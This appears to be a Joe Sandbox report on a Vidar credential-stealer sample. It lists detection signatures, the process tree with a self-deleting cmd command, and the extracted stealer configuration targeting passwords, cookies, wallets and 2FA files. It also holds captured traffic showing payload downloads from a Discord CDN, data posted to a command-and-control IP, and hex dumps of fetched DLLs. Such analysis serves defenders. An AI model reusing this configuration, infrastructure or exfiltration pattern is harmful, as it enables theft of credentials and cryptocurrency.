Play interactive tour

Edit tour

Windows Analysis Report MSQNZmmg2F.exe

Overview

General Information

Sample Name:	MSQNZmmg2F.exe
Analysis ID:	504018
MD5:	deae95754f08661dc895299dd91b6443
SHA1:	a3f86e7ab8d33ce2ee15aac5f75e998407addbfb
SHA256:	3276f5cb5545e19704b1ef2897c17d721d6e156323f48f19275997d3cc62d005
Tags:	ArkeiStealerexe
Infos:
Most interesting Screenshot:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Yara detected Vidar

Yara detected Vidar stealer

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for domain / URL

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Machine Learning detection for sample

Self deletion via cmd delete

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Creates files in alternative data streams (ADS)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Uses taskkill to terminate processes

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

MSQNZmmg2F.exe (PID: 1404 cmdline: 'C:\Users\user\Desktop\MSQNZmmg2F.exe' MD5: DEAE95754F08661DC895299DD91B6443)

VKOTTYY7FG6Q1H0K.exe (PID: 6312 cmdline: 'C:\ProgramData\VKOTTYY7FG6Q1H0K.exe' MD5: D9C2993126C94CCFD546F3A9F3F84AB5)

cmd.exe (PID: 6332 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /im MSQNZmmg2F.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\MSQNZmmg2F.exe' & del C:\ProgramData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 6428 cmdline: taskkill /im MSQNZmmg2F.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

timeout.exe (PID: 6512 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Configuration

Threatname: Vidar

{"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.247390446.0000000003480000.00000004.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: MSQNZmmg2F.exe PID: 1404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSQNZmmg2F.exe PID: 1404	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.MSQNZmmg2F.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.MSQNZmmg2F.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.MSQNZmmg2F.exe.33a0e50.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.MSQNZmmg2F.exe.33a0e50.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.MSQNZmmg2F.exe.3480000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.MSQNZmmg2F.exe.3480000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: HTTP data

Malware Configuration Extractor: Vidar {"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}

Multi AV Scanner detection for submitted file

Show sources

Source: MSQNZmmg2F.exe	Virustotal: Detection: 36%			Perma Link
Source: MSQNZmmg2F.exe	ReversingLabs: Detection: 66%

Multi AV Scanner detection for domain / URL

Show sources

Source: mas.to

Virustotal: Detection: 6%

Perma Link

Machine Learning detection for sample

Show sources

Source: MSQNZmmg2F.exe

Joe Sandbox ML: detected

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Unpacked PE file: 0.2.MSQNZmmg2F.exe.400000.0.unpack

Source: MSQNZmmg2F.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown

HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.7:49755 version: TLS 1.0

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.7:49752 version: TLS 1.2

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3[1].dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.0.dr
Source:	Binary string: C:\hoxanirumoxa19\hoterin66_xelenibilova\biwixiz\do.pdb source: MSQNZmmg2F.exe
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3[1].dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.0.dr
Source:	Binary string: 1C:\hoxanirumoxa19\hoterin66_xelenibilova\biwixiz\do.pdb`;J source: MSQNZmmg2F.exe
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.0.dr

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_00406060 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset,	0_2_00406060
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_00497C30 FindFirstFileW,FindNextFileW,FindNextFileW,	0_2_00497C30
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_00406C00 _sprintf,FindFirstFileA,_sprintf,CopyFileA,FindNextFileA,FindClose,	0_2_00406C00
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_03437E80 FindFirstFileW,FindNextFileW,FindNextFileW,	0_2_03437E80

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /@oleg98 HTTP/1.1Host: mas.to
Source: global traffic	HTTP traffic detected: GET /attachments/898638713985302540/898905970657345626/al.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Connection: Keep-AliveHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /1008 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 85934Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/898638713985302540/898905970657345626/al.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: cdn.discordapp.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 88.99.75.82 88.99.75.82
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 16 Oct 2021 14:53:23 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Sun, 17 Oct 2021 14:53:23 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 16 Oct 2021 14:53:23 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Sun, 17 Oct 2021 14:53:23 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 16 Oct 2021 14:53:24 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Sun, 17 Oct 2021 14:53:24 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
